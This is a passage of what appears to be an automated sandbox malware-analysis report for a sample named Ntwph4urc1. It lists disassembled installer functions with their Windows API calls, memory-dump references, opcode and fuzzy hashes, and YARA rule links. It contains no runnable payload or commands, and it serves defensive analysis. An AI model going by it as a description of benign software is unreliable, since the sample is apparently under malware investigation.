                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                            • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                            • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                            • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                            Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                              • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                            • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                            • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                            • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                            Function 00404CFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                            • GetMessagePos.USER32 ref: 00404D22
                                            • ScreenToClient.USER32(?,?), ref: 00404D3C
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                            • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                            • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                            Function 7435161D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,74352238,?,00000808), ref: 74351635
                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,74352238,?,00000808), ref: 7435163C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,74352238,?,00000808), ref: 74351650
                                            • GetProcAddress.KERNEL32(8"5t,00000000), ref: 74351657
                                            • GlobalFree.KERNEL32(00000000), ref: 74351660
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                            • String ID: 8"5t
                                            • API String ID: 1148316912-3662408271
                                            • Opcode ID: e7fbe865b06c8a90d60b6aa680a5ef9cc1424109877fd00cfecf8bf80557c533
                                            • Instruction ID: d9ea7dac467b88fe13b5c9e3c9ead21232fe8486686915842501c5b11e36065b
                                            • Opcode Fuzzy Hash: e7fbe865b06c8a90d60b6aa680a5ef9cc1424109877fd00cfecf8bf80557c533
                                            • Instruction Fuzzy Hash: 74F0F87325A1387BA62016B78C48EEBFE9CDF9F2F5B310211F62C9219186614C0197F1
                                            Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                            • MulDiv.KERNEL32(0006AB66,00000064,0006AD6A), ref: 00402F74
                                            • wsprintfW.USER32 ref: 00402F84
                                            • SetWindowTextW.USER32(?,?), ref: 00402F94
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402F7E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                            • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                            • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                            • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                            Function 743525B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 7435121B: GlobalAlloc.KERNEL32(00000040,?,7435123B,?,743512DF,00000019,743511BE,-000000A0), ref: 74351225
                                            • GlobalFree.KERNEL32(?), ref: 743526A3
                                            • GlobalFree.KERNEL32(00000000), ref: 743526D8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: c08e32d301f4b55be7d62d6b3b0b6bb15da9ced279a9c747340dca6d87fd0602
                                            • Instruction ID: 59e568133d0f4f1a2ad7d2a437064550dcf16bb3c4b29c37c3c0ccde118da829
                                            • Opcode Fuzzy Hash: c08e32d301f4b55be7d62d6b3b0b6bb15da9ced279a9c747340dca6d87fd0602
                                            • Instruction Fuzzy Hash: 92319932714501EBEB1A8F76C884E6AF7BEEB89310725452DF509C7224C770AA058FA1
                                            Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                            • GlobalFree.KERNEL32(?), ref: 004029F0
                                            • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                            • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                            • Opcode Fuzzy Hash: d8979d593ffb7cda73e724eb2d1dda972fc418b833f0f64d77b01377f8a14e7c
                                            • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                            Function 743518D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FreeGlobal
                                            • String ID:
                                            • API String ID: 2979337801-0
                                            • Opcode ID: 43bbf2c51713dc408eab1921e3d0c195b983ec0e5cfd6a0f1d6af26bd5cde923
                                            • Instruction ID: df164e8f6d39b54117b9056e9870a119677e8df532d7c438bcf9031c19c14afd
                                            • Opcode Fuzzy Hash: 43bbf2c51713dc408eab1921e3d0c195b983ec0e5cfd6a0f1d6af26bd5cde923
                                            • Instruction Fuzzy Hash: 9E51B332E10555AADF039FB58580DAEFBBAEF84260B154359D40EE3138D6B0AF828791
                                            Function 743523E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 74352522
                                              • Part of subcall function 7435122C: lstrcpynW.KERNEL32(00000000,?,743512DF,00000019,743511BE,-000000A0), ref: 7435123C
                                            • GlobalAlloc.KERNEL32(00000040), ref: 743524A8
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 743524C3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                            • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                            • String ID:
                                            • API String ID: 4216380887-0
                                            • Opcode ID: a98ddd93a74443eebd9bbd302d85f90ab4b36b92bad0aa33d360c64aa5fddce2
                                            • Instruction ID: 4b125fa45d5881b1b29cca25d90dcd27b9c8c4d6351df1ecd840c1ab389a2b23
                                            • Opcode Fuzzy Hash: a98ddd93a74443eebd9bbd302d85f90ab4b36b92bad0aa33d360c64aa5fddce2
                                            • Instruction Fuzzy Hash: E241ABB1608605EFE7159F72D880E6AF7BCEB98310B24481DE44EC71A1DB30A6458FA1
                                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                            • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                            • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                            • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDC.USER32(?), ref: 00401E51
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                            • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                            • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                            • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                            • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                            • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                            • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                            Function 00404BF1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                            Download Yara Rule
                                            APIs
